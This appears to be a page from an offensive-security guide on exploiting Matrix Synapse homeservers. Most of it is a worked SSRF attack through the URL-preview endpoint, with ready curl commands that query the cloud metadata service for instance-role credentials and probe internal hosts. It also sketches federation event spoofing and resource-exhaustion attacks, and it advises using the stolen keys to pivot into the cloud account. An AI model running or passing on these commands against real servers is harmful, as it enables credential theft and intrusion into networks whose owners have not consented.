Server exploitation

With the homeserver fingerprinted in enumeration, the server process becomes the target, and Synapse's URL-preview feature is the most direct server-side reach. When URL previews are enabled, the media repository fetches a user-supplied URL server-side to generate the link card, so a request naming an internal host or the cloud metadata service makes the homeserver itself issue that request from inside the network. That is server-side request forgery (SSRF): it reaches services not exposed externally and, on a cloud instance with a reachable metadata endpoint, pulls back instance credentials. Federation adds its own surface: request forgery and event-signature handling, and resource exhaustion through expensive federation operations.

Fingerprint first#

bash
# is this Synapse, and is URL preview enabled?
curl -s https://target.lan/_matrix/federation/v1/version      # {"server":{"name":"Synapse",...}}
# preview endpoint needs a token; grab one via authentication.md (open/guest registration)
curl -s -o /dev/null -w "%{http_code}\n" \
  -H 'Authorization: Bearer <token>' \
  "https://target.lan/_matrix/media/v3/preview_url?url=https://example.com"
# 200 with an og: JSON body => previews are on; 404/403/M_FORBIDDEN => disabled or restricted

URL preview requires a valid access token, so mint one first through authentication; confirm it is Synapse, since the preview endpoint and its SSRF are Synapse-specific.

Worked media-repository SSRF#

Point the preview at an internal target and read what the server fetches back:

bash
TOKEN=syt_your_token

# cloud metadata (AWS IMDSv1): the homeserver fetches it from inside the VPC
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://target.lan/_matrix/media/v3/preview_url?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# a JSON preview whose og:title/og:description echoes the role name => SSRF reaches the metadata service

# second hop: fetch the actual credentials document
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://target.lan/_matrix/media/v3/preview_url?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<rolename>"
# the preview body carries AccessKeyId / SecretAccessKey / Token from the instance role

# internal service probe
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://target.lan/_matrix/media/v3/preview_url?url=http://10.0.0.10:8080/"

Interpretation: the preview response reflects content the homeserver retrieved, so when the og: fields echo metadata or an internal page title, the server fetched an address you could not reach directly. The metadata path yields temporary cloud credentials for the instance role; the internal-host probe maps and reads services on the homeserver's network segment. Redirect-based and DNS-rebinding variants help where the parser blocks the literal metadata IP but follows a redirect or re-resolves a hostname to it.

Variants and other targets#

  • Federation request forgery and signatures: the federation API trusts signed events and server-key assertions; weak key validation or event-signature handling in a given release lets a malicious federating server inject or spoof events and state into rooms. Reach it on 8448 after reading the true backend from .well-known/matrix/server.
  • Resource exhaustion: federation operations such as joining a room with deep state, or /state and /backfill over large rooms, are expensive; a hostile server can drive CPU and memory on the target through repeated or oversized federation requests.
  • Dendrite and Conduit: the alternative homeservers have their own JSON and event parsing paths; feed malformed federation or client payloads to a version with a known parsing or panic bug identified from the /version banner.

Follow-on#

  • SSRF to the metadata service yields cloud instance credentials, the pivot from a single chat server into the wider cloud account; use the returned keys against the provider's APIs.
  • Internal SSRF maps and reaches back-end services (databases, admin panels) the homeserver can see, extending the foothold laterally.
  • Federation injection manipulates room state and membership across the network, enabling impersonation and takeover of rooms hosted elsewhere.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more